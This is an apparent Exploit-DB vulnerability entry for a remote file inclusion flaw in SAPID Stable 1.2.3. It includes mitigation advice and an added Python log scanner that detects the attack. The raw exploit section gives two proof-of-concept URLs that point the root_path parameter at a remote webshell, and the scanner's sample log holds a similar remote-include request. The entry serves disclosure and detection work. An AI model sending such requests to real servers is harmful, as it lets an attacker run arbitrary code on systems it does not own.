Vendor: SAPID Stable
By: Opa Yong
CVSS: 8.8 (HIGH)
Type: Remote File Inclusion (RFI)
CWE: 98
Product Name: SAPID Stable
Affected Version From: 1.2.3
Affected Version To: 1.2.3
Patch Exists: NO
Related CWE: N/A
CPE: a:sapid:sapid:1.2.3
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP Home Edition SP2
2011

SAPID Stable (RFI)

A Remote File Inclusion (RFI) vulnerability exists in SAPID Stable version 1.2.3. An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to the vulnerable server. This can allow the attacker to execute arbitrary code on the vulnerable server.

Mitigation:

To mitigate this vulnerability, ensure that user input is properly sanitized and validated before being used in any file operations. Additionally, ensure that the web server is configured to only serve files from a trusted directory.
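
One way to look for this request pattern in web server logs, as an added example that is not part of the original entry or the Exploit-DB submission: it flags direct requests to `.inc.php` files that set `root_path`, plain or through `GLOBALS[root_path]`, the parameter names in this entry's proof-of-concept URLs. The combined access log format, the sample log lines and the function name `flag_rfi_attempts` are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Request line inside a combined-format access log entry (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Parameter names from this entry's proof-of-concept URLs, compared lower-cased.
WATCHED = {"root_path", "globals[root_path]"}
# A value that points the include at another host: scheme:// or //host.
REMOTE = re.compile(r'^\s*(?:[a-z][a-z0-9+.-]*:)?//', re.IGNORECASE)

# Constructed sample log lines (documentation addresses, example.test host).
SAMPLE_LOG = [
    '192.0.2.10 - - [08/Jan/2011:10:00:01 +0000] "GET /index.php?page=home HTTP/1.1" 200 5120',
    '198.51.100.7 - - [08/Jan/2011:10:00:05 +0000] "GET /usr/extensions/get_tree.inc.php?GLOBALS%5Broot_path%5D=http://files.example.test/a.txt%3F HTTP/1.1" 200 312',
    '198.51.100.7 - - [08/Jan/2011:10:00:09 +0000] "GET /usr/extensions/get_infochannel.inc.php?root_path=../ HTTP/1.1" 200 87',
]

def flag_rfi_attempts(log_lines):
    """Return (line_no, path, param, verdict) for each suspicious request."""
    findings = []
    for line_no, line in enumerate(log_lines, start=1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        target = urlsplit(match.group(1))
        # Include fragments are meant to be pulled in by PHP, not requested directly.
        if not target.path.lower().endswith(".inc.php"):
            continue
        # parse_qsl percent-decodes names and values, so %5B and %5D are handled.
        for name, value in parse_qsl(target.query, keep_blank_values=True):
            if name.lower() in WATCHED:
                verdict = "remote-include" if REMOTE.match(value) else "path-override"
                findings.append((line_no, target.path, name, verdict))
    return findings

if __name__ == "__main__":
    for finding in flag_rfi_attempts(SAMPLE_LOG):
        print(finding)
```

Either verdict on these scripts deserves review, since the entry lists no patch for version 1.2.3.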

Exploit-DB raw data:

# Exploit Title: SAPID Stable (RFI)
# Google Dork: ask Dan Pemula :D
# Date: January 08 2011
# Author: Opa Yong
# Software Link: http://sourceforge.net/projects/sapid/files/sapid-cms/
# Version: SAPID 1.2.3 Stable
# Tested on: Windows XP Home Edition SP2


@POC: http://127.0.1/usr/extensions/get_tree.inc.php?GLOBALS[root_path]=[webshell.txt?]
@POC: http://127.0.1/usr/extensions/get_infochannel.inc.php?root_path=[webshell.txt?]


Message: Never call yourself a hacker; it is better for the people around you to be the ones who say you are a hacker.


Special thanks to Dan Pemula